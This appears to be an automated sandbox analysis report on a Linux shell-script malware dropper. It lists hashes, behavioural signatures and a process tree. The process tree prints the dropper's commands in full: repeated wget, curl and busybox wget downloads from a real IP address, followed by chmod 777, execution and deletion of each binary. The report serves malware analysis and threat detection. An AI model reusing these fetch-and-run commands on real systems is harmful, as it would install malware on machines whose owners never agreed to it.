Analysis
-
max time kernel
25s -
max time network
69s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/10/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
-
Size
10KB
-
MD5
d230b0059d55644a966d0f2b3a653b23
-
SHA1
003616a6507ccbca767f2e56341b347b94f487da
-
SHA256
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2
-
SHA512
a1badc3ffaa64936805465c8e74e14083c226341b67e35b985dee197f0a8487e2d4c99fcb203e633dd67e60963b748b38a743e4d94b48038d381bfdd460e2f4f
-
SSDEEP
96:iwrwrw7vQ4vx64/jk3WKJsPGOhC+tlxnAltsw/JlJdJgJRJNJ1ChSkdz/jk3WK8i:ik4ET564/jk3vJsbIW6/jk3v3lk4ETgB
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 19 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 700 chmod 744 chmod 730 chmod 805 chmod 819 chmod 843 chmod 694 chmod 714 chmod 790 chmod 837 chmod 863 chmod 875 chmod 683 chmod 759 chmod 849 chmod 857 chmod 869 chmod 775 chmod 831 chmod -
Executes dropped EXE 19 IoCs
ioc pid Process /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH 685 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h 695 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM 701 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd 715 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM 731 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI 745 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG 760 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg 791 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj 807 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy 821 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc 832 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 838 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw 844 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd 850 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM 858 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI 864 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG 870 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj 876 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj -
Checks CPU configuration 1 TTPs 19 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 19 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM curl File opened for modification /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd curl File opened for modification /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI curl File opened for modification /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG curl File opened for modification /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B curl File opened for modification /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg curl File opened for modification /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc curl File opened for modification /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd curl File opened for modification /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw curl File opened for modification /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG curl File opened for modification /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h curl File opened for modification /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj curl File opened for modification /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy curl File opened for modification /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM curl File opened for modification /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH curl File opened for modification /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM curl File opened for modification /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 curl File opened for modification /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI curl File opened for modification /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj curl
Processes
-
/tmp/3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh/tmp/3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh1⤵PID:656
-
/bin/rm/bin/rm bins.sh2⤵PID:657
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:659
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:672
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:681
-
-
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Executes dropped EXE
PID:685
-
-
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:686
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:688
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:691
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:693
-
-
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Executes dropped EXE
PID:695
-
-
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:696
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:697
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:698
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:699
-
-
/bin/chmodchmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Executes dropped EXE
PID:701
-
-
/bin/rmrm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:702
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:703
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:706
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:711
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:714
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:715
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:719
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:727
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:732
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:734
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:741
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:746
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:747
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:756
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:761
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:763
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:772
-
-
/bin/chmodchmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:778
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:779
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:787
-
-
/bin/chmodchmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:803
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:816
-
-
/bin/chmodchmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:830
-
-
/bin/chmodchmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:836
-
-
/bin/chmodchmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:840
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:842
-
-
/bin/chmodchmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:845
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:846
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:848
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:855
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:862
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:868
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:874
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:878
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97